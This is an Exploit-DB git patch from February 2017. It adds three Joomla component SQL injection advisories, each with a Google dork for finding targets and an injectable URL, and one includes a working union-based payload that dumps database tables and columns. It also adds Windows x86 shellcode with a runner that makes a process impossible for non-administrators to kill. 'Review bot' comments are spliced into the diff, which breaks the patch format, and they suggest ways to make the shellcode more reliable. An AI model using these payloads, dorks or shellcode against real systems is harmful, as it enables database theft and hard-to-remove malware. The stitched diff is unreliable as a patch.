From 2d72a9c8b9eb0c99c78001f7f711c7b8f3daba94 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 18 Feb 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-02-18 4 new exploits Netgear WGR614v9 Wireless Router - GET Request Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Windows x86 - Protect Process Shellcode (229 bytes) Qwerty CMS - 'id' SQL Injection Qwerty CMS - 'id' Parameter SQL Injection Golabi CMS - Remote File Inclusion Golabi CMS 1.0 - Remote File Inclusion blogman 0.45 - Multiple Vulnerabilities EZ-Blog 1b - Delete All Posts / SQL Injection Blogman 0.45 - Multiple Vulnerabilities EZ-Blog beta1 - Delete All Posts / SQL Injection Access2asp - imageLibrary - (ASP) Arbitrary File Upload Access2asp - imageLibrary - Arbitrary File Upload Joomla! Component com_digistore - 'pid' Blind SQL Injection Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection EZ-Blog Beta2 - (category) SQL Injection EZ-Blog Beta2 - 'category' Parameter SQL Injection Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection Joomla! Component Groovy Gallery 1.0.0 - SQL Injection Joomla! 
Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection
---
 files.csv | 26 +++---
 platforms/php/webapps/41379.txt | 17 ++++
 platforms/php/webapps/41380.txt | 18 +++++
 platforms/php/webapps/41382.txt | 18 +++++
 platforms/win_x86/shellcode/41381.c | 121 ++++++++++++++++++++++++++++
 5 files changed, 189 insertions(+), 11 deletions(-)
 create mode 100755 platforms/php/webapps/41379.txt
 create mode 100755 platforms/php/webapps/41380.txt
 create mode 100755 platforms/php/webapps/41382.txt
 create mode 100755 platforms/win_x86/shellcode/41381.c
diff --git a/files.csv b/files.csv
index 00b8574af..8975101b6 100644
--- a/files.csv
+++ b/files.csv
@@ -949,7 +949,7 @@ id,file,description,date,author,platform,type,port
 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0
 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0
-8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - GET Request Denial of Service",2009-02-25,staticrez,hardware,dos,0
+8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0
 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0
 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0
 8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0
@@ -3649,7 +3649,7 @@ id,file,description,date,author,platform,type,port
 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0
 28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0
 28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0
-28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
+28775,platforms/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
 28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos,0
 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0
 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0
@@ -3962,7 +3962,7 @@ id,file,description,date,author,platform,type,port
 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0
 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0
 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0
-31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0
+31403,platforms/unix/dos/31403.txt,"Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0
 31429,platforms/multiple/dos/31429.py,"VideoLAN VLC Media Player 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,multiple,dos,0
 31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0
 31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0
@@ -8172,7 +8172,7 @@ id,file,description,date,author,platform,type,port
 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0
 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
-30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
+30839,platforms/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
 30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0
 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
 31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
@@ -15897,6 +15897,7 @@ id,file,description,date,author,platform,type,port
 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
+41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -20786,13 +20787,13 @@ id,file,description,date,author,platform,type,port
 8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' Parameter SQL Injection",2009-02-23,K-159,php,webapps,0
 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0
 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0
-8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
+8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' Parameter SQL Injection",2009-02-24,b3,php,webapps,0
 8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0
 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
-8112,platforms/php/webapps/8112.txt,"Golabi CMS - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0
+8112,platforms/php/webapps/8112.txt,"Golabi CMS 1.0 - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0
 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0
 8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0
 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
@@ -20800,13 +20801,13 @@ id,file,description,date,author,platform,type,port
 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
-8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
-8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0
+8127,platforms/php/webapps/8127.txt,"Blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
+8128,platforms/php/webapps/8128.txt,"EZ-Blog beta1 - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0
 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0
 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0
-8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - (ASP) Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0
+8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0
 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps,0
-8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0
+8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0
 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0
 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0
 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0
@@ -21010,7 +21011,7 @@ id,file,description,date,author,platform,type,port
 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0
 8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0
 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
-8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
+8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' Parameter SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0
 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php with' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0
@@ -37296,3 +37297,6 @@ id,file,description,date,author,platform,type,port
 41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0
 41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80
 41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0
+41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
+41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
+41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41379.txt b/platforms/php/webapps/41379.txt
new file mode 100755
index 000000000..cb685ede4
--- /dev/null
+++ b/platforms/php/webapps/41379.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_teamdisplay
+# Date: 17.02.2017
+# Vendor Homepage: http://addonstreet.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/
+# Demo: http://addonstreet.com/demo/teamdisplay/
+# Version: 1.2.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41380.txt b/platforms/php/webapps/41380.txt
new file mode 100755
index 000000000..8df22ecd4
--- /dev/null
+++ b/platforms/php/webapps/41380.txt
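Review bot: The 41379.txt advisory identifies the injectable parameter (`filter_category` on `view=members`) and a tested version, but records no vendor notification date, vendor advisory, fixed version or CVE, so a defender reading it cannot tell whether releases after 1.2.1 are affected or whether any patch exists. A header line such as `# Vendor Notified / Fixed Version: [not stated]` (placeholder wording) would make that status explicit instead of leaving it to be inferred from the absence of a reference. The same omission applies to 41380.txt and 41382.txt in this patch.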
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_groovygallery
+# Date: 17.02.2017
+# Vendor Homepage: http://addonstreet.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
+# Demo: http://addonstreet.com/products/groovy-gallery
+# Version: 1.0.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
+# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41382.txt b/platforms/php/webapps/41382.txt
new file mode 100755
index 000000000..b13356c2c
--- /dev/null
+++ b/platforms/php/webapps/41382.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_wmt_content_timeline
+# Date: 17.02.2017
+# Vendor Homepage: http://devecostudio.com
+# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
+# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
+# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
+# # # # #
\ No newline at end of file
diff --git a/platforms/win_x86/shellcode/41381.c b/platforms/win_x86/shellcode/41381.c
new file mode 100755
index 000000000..cb879c320
--- /dev/null
+++ b/platforms/win_x86/shellcode/41381.c
@@ -0,0 +1,121 @@
+/*
+
+# Win32 - Protect Process Shellcode
+# Date: [17.02.2017]
+# Author: [Ege Balcı]
+# Tested on: [Win 7/8/8.1/10]
+
+This shellcode sets the SE_DACL_PROTECTED flag inside security descriptor structure,
+this will prevent the process being terminated by non administrative users.
+
+-----------------------------------------------------------------
+
+[BITS 32]
+[ORG 0]
+
+; EAX-> Return Values
+; EBX-> Process Handle
+; EBP-> API Block
+; ESI-> Saved ESP
+
+ pushad ; Save all registers to stack
+ pushfd ; Save all flags to stack
+
+ push esp ; Push the current esp value
+ pop esi ; Save the current esp value to ecx
+
+ cld ; Clear direction flags
+ call Start
+
+%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
+
+Start:
+ pop ebp ; Pop the address of SFHA
+
+ push 0x62C64749 ; hash(kernel32.dll, GetCurrentProcessId())
+ call ebp ; GetCurrentProcessId()
+
+ push eax ; Process ID
+ push 0x00000000 ; FALSE
+ push 0x1F0FFF ; PROCESS_ALL_ACCESS
+ push 0x50B695EE ; hash(kernel32.dll, OpenProcess)
+ call ebp ; OpenProcess(PROCESS_ALL_ACCESS,FALSE,ECX)
+ mov ebx, eax ; Move process handle to ebx
+
+
+ push 0x00000000 ; 0,0
+ push 0x32336970 ; pi32
+ push 0x61766461 ; adva
+ push esp ; Push the address of "advapi32" string
+ push 0x0726774C ; hash(kernel32.dll, LoadLibraryA)
+ call ebp ; LoadLibraryA("advapi32")
+
+ push 0x00503a44 ; "D:P"
+ sub esp,4 ; Push the address of "D:P" string to stack
+
+ push 0x00000000 ; FALSE
+ lea eax, [esp+4] ; Load the address of 4 byte buffer to EAX
+ push eax ; Push the 4 byte buffer address
+ push 0x00000001 ; SDDL_REVISION_1
+ lea eax, [esp+16] ; Load the address of "D:P" string to EAX
+ push eax ; Push the EAX value
+ push 0xDA6F639A ; hash(advapi32.dll, ConvertStringSecurityDescriptorToSecurityDescriptor)
+ call ebp ; ConvertStringSecurityDescriptorToSecurityDescriptor("D:P",SDDL_REVISION_1,FALSE)
+
+ push 0x00000004 ; DACL_SECURITY_INFORMATION
+ push ebx ; Process Handle
+ push 0xD63AF8DB ; hash(kernel32.dll, SetKernelObjectSecurity)
+ call ebp ; SetKernelObjectSecurity(ProcessHandle,DACL_SECURITY_INFORMATION,SecurityDescriptor)
+
+ mov esp,esi ; Restore the address of esp
+ popad ; Popback all registers
+ popfd ; Popback all flags
+ ret ; Return
+
+
+*/
+
+
+//>Special thanks to Yusuf Arslan Polat ;D
+#include
+#include
+
+unsigned char Shellcode[] = {
+ 0x60, 0x9c, 0x54, 0x5e, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
+ 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
+ 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
+ 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2,
+ 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
+ 0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
+ 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac,
+ 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8,
+ 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66,
+ 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01,
+ 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
+ 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x49, 0x47,
+ 0xc6, 0x62, 0xff, 0xd5, 0x50, 0x6a, 0x00, 0x68, 0xff, 0x0f, 0x1f, 0x00,
+ 0x68, 0xee, 0x95, 0xb6, 0x50, 0xff, 0xd5, 0x89, 0xc3, 0x6a, 0x00, 0x68,
+ 0x70, 0x69, 0x33, 0x32, 0x68, 0x61, 0x64, 0x76, 0x61, 0x54, 0x68, 0x4c,
+ 0x77, 0x26, 0x07, 0xff, 0xd5, 0x68, 0x44, 0x3a, 0x50, 0x00, 0x83, 0xec,
+ 0x04, 0x6a, 0x00, 0x8d, 0x44, 0x24, 0x04, 0x50, 0x6a, 0x01, 0x8d, 0x44,
+ 0x24, 0x10, 0x50, 0x68, 0x9a, 0x63, 0x6f, 0xda, 0xff, 0xd5, 0x6a, 0x04,
+ 0x53, 0x68, 0xdb, 0xf8, 0x3a, 0xd6, 0xff, 0xd5, 0x89, 0xf4, 0x61, 0x9d,
+ 0xc3
+};
+
+
+
+int main(int argc, char const *argv[])
+{
+ char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(BUFFER, Shellcode, sizeof(Shellcode));
+ (*(void(*)())BUFFER)();
+
+ printf("This process is protected !");
+ getchar();
+
+ return 0;
+}
+
+
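Review bot: In `main` the `VirtualAlloc` result is handed to `memcpy` and then called without a NULL check, so an allocation failure becomes a null-pointer dereference rather than a clean exit; add `if (BUFFER == NULL) { return 1; }` directly after the allocation. The two `#include` directives above the `Shellcode` array are printed with no header operand — possibly lost in rendering, but as shown the file does not compile, and `<windows.h>`, `<stdio.h>` and `<string.h>` are what `VirtualAlloc`, `printf`/`getchar` and `memcpy` need. The `This process is protected !` message is printed unconditionally: the assembly header documents EAX as the return-value register, yet no API result is tested anywhere before the final `ret`, so a failed `ConvertStringSecurityDescriptorToSecurityDescriptor` or `SetKernelObjectSecurity` still reports success, and anyone validating the claim should read the process DACL back afterwards rather than rely on the message. The comment `; hash(kernel32.dll, SetKernelObjectSecurity)` names the wrong module — that function is exported by advapi32.dll (which is why the code loads it first) — so either the comment or the hash constant is inconsistent and should be checked against the hash routine in `API-BLOCK.asm`; if the constant is right, the comment should read `; hash(advapi32.dll, SetKernelObjectSecurity)`. If I read the `D:P` SDDL string correctly it installs an empty protected DACL, which withholds the requested access from every principal and not only from non-administrative users as the header sentence says, so the header should state that and note that the owner keeps only its implicit rights — worth confirming before it is documented as a fact.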